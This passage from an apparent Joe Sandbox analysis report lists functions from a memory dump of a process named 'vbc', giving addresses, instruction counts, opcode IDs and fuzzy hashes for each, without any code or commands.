                                                                                    • Opcode Fuzzy Hash: f877fda14c8441c137ce4a4845dfee86641c8d9ce650320ff6f1233038e6404f
                                                                                    • Instruction Fuzzy Hash: 28416735714646EBDB16AF29C948B6ABBB6FF85744F044055EC02C7661DB31EC20CB90
                                                                                    Function 058902E1 Relevance: .1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                    • Instruction ID: 3b104c895fae12b54d8ecce4eb48898f0e7025e23701099dcd64114ee721004e
                                                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                    • Instruction Fuzzy Hash: 0031F531A04348EFDF25DB68CC48BAEBBE9EF05354F0841A5EC56E7252C6749C84CB61
                                                                                    Function 0592E3DB Relevance: .1, Instructions: 105COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb0920605a71958a9b5971b227384ce9948a85a08bcb80a2dee4f5554ffe710e
                                                                                    • Instruction ID: a521d51125cfb11d9f9e3c1cb59bb963442ce9285553b558918f1e28eacbc2d5
                                                                                    • Opcode Fuzzy Hash: bb0920605a71958a9b5971b227384ce9948a85a08bcb80a2dee4f5554ffe710e
                                                                                    • Instruction Fuzzy Hash: E531A835750719ABEB229F598C85F7B77A9EF49B50F100028FA04EB295DAA4DC00C7E1
                                                                                    Function 05884260 Relevance: .1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 244322b8df296f220fd6ebabcd109152c4e0d9c6d0a1bafcf29e3c3b33474c7e
                                                                                    • Instruction ID: e9677d8398aa1c081518d160df389054a2325dde170ba6ee0b4d0d035ba77abe
                                                                                    • Opcode Fuzzy Hash: 244322b8df296f220fd6ebabcd109152c4e0d9c6d0a1bafcf29e3c3b33474c7e
                                                                                    • Instruction Fuzzy Hash: B9415B72204B45DFCB22DF68C489FA67BE5AB45718F144829ED9ACB260CB74EC04CB50
                                                                                    Function 05920DF0 Relevance: .1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                    • Instruction ID: ab6727e267d32db3f9d4109701aa88eb7b4ea0e9f98ad28cc2d9c05ad897c877
                                                                                    • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                    • Instruction Fuzzy Hash: 1631C472609355AFD726DB14C849E6BBBACEF80660F04496DF8918B250E670EC44CBA2
                                                                                    Function 059461C3 Relevance: .1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f4c53378244f9666c3deeba6c06f3eda548ba4b0cf4f3975cb9fbac973b7e462
                                                                                    • Instruction ID: dc28f8ab89beef95b2ec64208ee58a1d49abdcc75702d11446de7202c368731a
                                                                                    • Opcode Fuzzy Hash: f4c53378244f9666c3deeba6c06f3eda548ba4b0cf4f3975cb9fbac973b7e462
                                                                                    • Instruction Fuzzy Hash: A231E1B6A0021ABBDB15DF98CC44FAEB7BAFB45B40F454168E900EB244D770ED40CBA0
                                                                                    Function 058807AF Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1749f5ece76c9871bc2396d3fa9fc63c1ddbe795028c25788d08fc421848f649
                                                                                    • Instruction ID: efaed334c277b11dd9b85f8d938dcf57ef0f5dabfbe1422560e94ae74b4a025b
                                                                                    • Opcode Fuzzy Hash: 1749f5ece76c9871bc2396d3fa9fc63c1ddbe795028c25788d08fc421848f649
                                                                                    • Instruction Fuzzy Hash: 1C319132B04719DBC712EE288C89E7BB7AAEF94754F014529EC55DB310DA30DC4997E2
                                                                                    Function 059460B8 Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2aeb17018ad7fa60a76cae938699d086accd05d8a156e9621f4c235e2045ee50
                                                                                    • Instruction ID: fcd75af4617bad98d326e6a68ed8b0f2deae5d5eed657ab208b3e6fed2264c0c
                                                                                    • Opcode Fuzzy Hash: 2aeb17018ad7fa60a76cae938699d086accd05d8a156e9621f4c235e2045ee50
                                                                                    • Instruction Fuzzy Hash: AF31C2B1700605AFDF269F99C950E6EBBAAEF89754F04046AE509DB341DB30EC008F90
                                                                                    Function 05888550 Relevance: .1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7b9f6f9096ac5bac2cb52137c42172dd4c94c6e215059f0d481420af646af8df
                                                                                    • Instruction ID: 9742e36aa42dcdd6c1afdda44e122cd32ddb08cd7d1b22526785e608604454db
                                                                                    • Opcode Fuzzy Hash: 7b9f6f9096ac5bac2cb52137c42172dd4c94c6e215059f0d481420af646af8df
                                                                                    • Instruction Fuzzy Hash: 083146766093018FE321DF19C940B2AB7E9FB88710F45496DEC86DB291D770EC48CB92
                                                                                    Function 058AAF69 Relevance: .1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3f6500dcb43b13009f88ae2650e189b37a051870de49eb3091bac6cf42b9fd7
                                                                                    • Instruction ID: 91625a67d18f85a1971653fadb931246fcbf6bd8919b8af4cb30f5b7dca9033a
                                                                                    • Opcode Fuzzy Hash: a3f6500dcb43b13009f88ae2650e189b37a051870de49eb3091bac6cf42b9fd7
                                                                                    • Instruction Fuzzy Hash: 03317772A012289BEB25DF59CC48FAF77B9FF45644F0500AAEC09E7250D6349E41CF51
                                                                                    Function 058BA6C7 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                    • Instruction ID: 830eed18d3919c34279a9b511c1755dbc51ccf98994a4e219f4b8109225fdd3e
                                                                                    • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                    • Instruction Fuzzy Hash: 1F310C72B08701AFE764CF6ADD41B97B7F9BB08A50F14452DA99AC3750E670ED008B64
                                                                                    Function 058A438F Relevance: .1, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3f84dc34305631bf7242b2bba96310eb4d3c88decc6db70a326cf388039aaec0
                                                                                    • Instruction ID: 2ffa163bb80b664131e637f3be263832707bdbcf7f0faa3e39bff7057577cf91
                                                                                    • Opcode Fuzzy Hash: 3f84dc34305631bf7242b2bba96310eb4d3c88decc6db70a326cf388039aaec0
                                                                                    • Instruction Fuzzy Hash: 7C31CF32B066059FEF25DFB8C985A6AB7FAAB80304F10842AD856D3264E770DD41CB91
                                                                                    Function 0587E420 Relevance: .1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ea579d799ce435aed439ec952fd4bbfa11560d3dcfb9c046028a684cc4c4520
                                                                                    • Instruction ID: 0e1bddb1c9f9b9f111321853b946a845f38503355ab3f1ae34da74d78970778e
                                                                                    • Opcode Fuzzy Hash: 8ea579d799ce435aed439ec952fd4bbfa11560d3dcfb9c046028a684cc4c4520
                                                                                    • Instruction Fuzzy Hash: AE31A232A01A2C9BDB35DA28CC41FEE77BEEB05744F0501E5EA45EB290D674DE808F91
                                                                                    Function 0587C156 Relevance: .1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67404678517b3c3749f0cca0d062289809245603b91e5f77ff614f5baf339c8b
                                                                                    • Instruction ID: 74e7de1cd0d2046659038e73a01ccbb59a5af6d7117f4c5cf0e2319d4dd0af9b
                                                                                    • Opcode Fuzzy Hash: 67404678517b3c3749f0cca0d062289809245603b91e5f77ff614f5baf339c8b
                                                                                    • Instruction Fuzzy Hash: 8431F6B66013009BCB20AF28C845B79BBB5BF81314F5481A9DC46DB342DA34DD86CBE0
                                                                                    Function 0593C3CD Relevance: .1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                    • Instruction ID: 75ea992ba155c1c4e1bd6e23dfbf96457e0c9f5feea478256910d96dc0a71d50
                                                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                    • Instruction Fuzzy Hash: F4213B36700A55E6CF25AB989805EBAB7F5EF80710F40901AF995DB651E634ED40C361
                                                                                    Function 058B4588 Relevance: .1, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                    • Instruction ID: 20ef7c289f9031615a7994dda47edad6d3d217e68613c9d5265f61e69d36da11
                                                                                    • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                    • Instruction Fuzzy Hash: 0A216031A00608EBEF15CF58C985A9EBBAAFF49714F108069ED15DB352D6B1EE058B90
                                                                                    Function 058B44B0 Relevance: .1, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ad95dee2bebe8500c12cca954b445c2b9d5ebebbe8281dc8ed8ad4e8f0ca745
                                                                                    • Instruction ID: 20512cc5d9f72c3a4ca1e66c67b8516dc43ccd09681fa2b974fffb15f7f99289
                                                                                    • Opcode Fuzzy Hash: 6ad95dee2bebe8500c12cca954b445c2b9d5ebebbe8281dc8ed8ad4e8f0ca745
                                                                                    • Instruction Fuzzy Hash: 6621A272608B459BDB21CE18C841BAB77EAFB88750F044519FD55DB351D7B0EE00CBA2
                                                                                    Function 058FE609 Relevance: .1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac2ca911106948aa268886656216f20edc9964a19d2cf6d55316ab08b3c9aa94
                                                                                    • Instruction ID: e06ca3245a87469e610dfe5823a9eea7c1b90e29cf8eb20aa02e2dbc7c066de2
                                                                                    • Opcode Fuzzy Hash: ac2ca911106948aa268886656216f20edc9964a19d2cf6d55316ab08b3c9aa94
                                                                                    • Instruction Fuzzy Hash: 37318D75600209EFCB54CF18C8849AEB7BAFF88304B11445AED0ADB3A0E735EE50CB95
                                                                                    Function 0587E388 Relevance: .1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                    • Instruction ID: f1222f772ac424432bee10db65c0317b36f6434a406dbcb1cf6c17c388512577
                                                                                    • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                    • Instruction Fuzzy Hash: FB316B31600608EFD721DB68C888F6AB7F9FF85358F1445A9E952CB290E734EE01CB51
                                                                                    Function 05888D59 Relevance: .1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                    • Instruction ID: 74580f0647e13b43c85c1299596c8256b9aae19cf5350165905c66d8ba15232f
                                                                                    • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                    • Instruction Fuzzy Hash: B8212139700685ABE72AE728CC19B3577EAFF82758F0D08A0DD03D76D1E7689C408651
                                                                                    Function 059006F1 Relevance: .1, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 27dab7cd89f7f67209f070187b9b5335c5fb2c03404aec3b69f565281a80c6ac
                                                                                    • Instruction ID: b422e3849b7f16ef0d0a509710b283c4bc320290b658c04ca9f18fcbfa678297
                                                                                    • Opcode Fuzzy Hash: 27dab7cd89f7f67209f070187b9b5335c5fb2c03404aec3b69f565281a80c6ac
                                                                                    • Instruction Fuzzy Hash: 9921A071A006299FCF14DF59C885ABEB7F9FF48740B54046AF841EB250E738AD41DBA1
                                                                                    Function 0590019F Relevance: .1, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b12f4e5086019bd2801eb83d4bba6bd1edeb0df0dfe3ad92fae571b3ecb24b5
                                                                                    • Instruction ID: 03ceca5cc30851f51da606fbd017a9ec449e470fc2a1d5b14d564b2bfc1b49b7
                                                                                    • Opcode Fuzzy Hash: 2b12f4e5086019bd2801eb83d4bba6bd1edeb0df0dfe3ad92fae571b3ecb24b5
                                                                                    • Instruction Fuzzy Hash: 5921AE71600644AFDB15DB6CC948F6AB7B8FF88740F140469F905DB6A0DA38ED40CBA4
                                                                                    Function 05900283 Relevance: .1, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a82b0348fbdc3b22fbb602762855ed3bbb6a1ab6056d94187df7e27d7af26c7e
                                                                                    • Instruction ID: 9d965139f97be50651d01a2530af7a517b023e2197083b9ae59b7073f4384084
                                                                                    • Opcode Fuzzy Hash: a82b0348fbdc3b22fbb602762855ed3bbb6a1ab6056d94187df7e27d7af26c7e
                                                                                    • Instruction Fuzzy Hash: F121A172A083459FDB12EF59C84CB6BB7DCEF81244F480C66BC81C72A1D734DA04C6A2
                                                                                    Function 05886C50 Relevance: .1, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                    • Instruction ID: b0df689a4b3224f1ce6565357a17681aba7b5b47b36befe301a63812efbc8292
                                                                                    • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                    • Instruction Fuzzy Hash: 42316575604604CFC720CF59C080B26BBFAFB48718F2484A9E94ACB751EB31ED42CB90
                                                                                    Function 0593A49A Relevance: .1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33881e15a2ee7a13aca797a07478fd3fd37900debbaac01c0bba57b9f09e65ec
                                                                                    • Instruction ID: 12e56216ac1d412ec82d06aab42e9a79d13b656fd6990b70c23d10b244883751
                                                                                    • Opcode Fuzzy Hash: 33881e15a2ee7a13aca797a07478fd3fd37900debbaac01c0bba57b9f09e65ec
                                                                                    • Instruction Fuzzy Hash: 66110A72350B14FFD72256589C06F2BB699DBC4B60F110428BA88CB1C0DE74EC018696
                                                                                    Function 058BA30B Relevance: .1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: afe8c0367787a4ff8413513e86361003ff9ee5dff861ccf76c9e9a0515c9c05a
                                                                                    • Instruction ID: ae410a0e135585c68546ff4c05717e8841f6ea15c10786f7c4b1d695d5c7100f
                                                                                    • Opcode Fuzzy Hash: afe8c0367787a4ff8413513e86361003ff9ee5dff861ccf76c9e9a0515c9c05a
                                                                                    • Instruction Fuzzy Hash: 9E216A35200B009FCB29DF29C901B5677F5AF48B08F288569A949CBB61E671EC42CB94
                                                                                    Function 059180A8 Relevance: .1, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                    • Instruction ID: e9e8b6400ce1b33e070742116fcc6e043fd9a3bb19b1c96232eeb35389f0e9be
                                                                                    • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                    • Instruction Fuzzy Hash: 5C214772A00219AFDF129F98CD44BAEBBBAEB89310F200819FD55A7250D734DD509B54
                                                                                    Function 05888770 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f024bf538917ffaa4529b38bb5085c417f9743e1b8cc7dd7d5c0a10086ee8058
                                                                                    • Instruction ID: 4e1bbc39eee10c326fc35d26a437ad450093179e68c8a13c9fd36ddc9bc39592
                                                                                    • Opcode Fuzzy Hash: f024bf538917ffaa4529b38bb5085c417f9743e1b8cc7dd7d5c0a10086ee8058
                                                                                    • Instruction Fuzzy Hash: 6811B231700A149BCB11EF49C580A76B7F9FF8AB10B984469ED09EF205D6B2ED018F90
                                                                                    Function 058B0124 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                    • Instruction ID: d8f1d0123fa6b3f111e6725b97eae0d056a00aa2a5b2d3751bbfa78046420f0f
                                                                                    • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                    • Instruction Fuzzy Hash: 8311D372600704EFE7269A48C849F9B7BBDEB80754F140029EA00DF290D6B1ED44CB55
                                                                                    Function 05924F42 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                    • Instruction ID: 7dfa4acceabdf4bfeadb4f572c0fb0db6f02850e1aa9ed3c37200a9f025f4609
                                                                                    • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                    • Instruction Fuzzy Hash: B4215075A04219AFCB05CF88C880DEEBBB9FF98304B1540A9E805A7351DA719E41CBA0
                                                                                    Function 058880E9 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0013b9c4b9838a64e6508440d52ae6ab003773a401251f4f4dfc2f809a7c2c56
                                                                                    • Instruction ID: d549530407c4664f826fdd454e3e73444e14b007267d515e3f86a97463d37495
                                                                                    • Opcode Fuzzy Hash: 0013b9c4b9838a64e6508440d52ae6ab003773a401251f4f4dfc2f809a7c2c56
                                                                                    • Instruction Fuzzy Hash: A4214975A4020ADFCB14DF98C581ABEBBB6FB88718F64456DD505AB310CB71AE06CF90
                                                                                    Function 058B674D Relevance: .1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
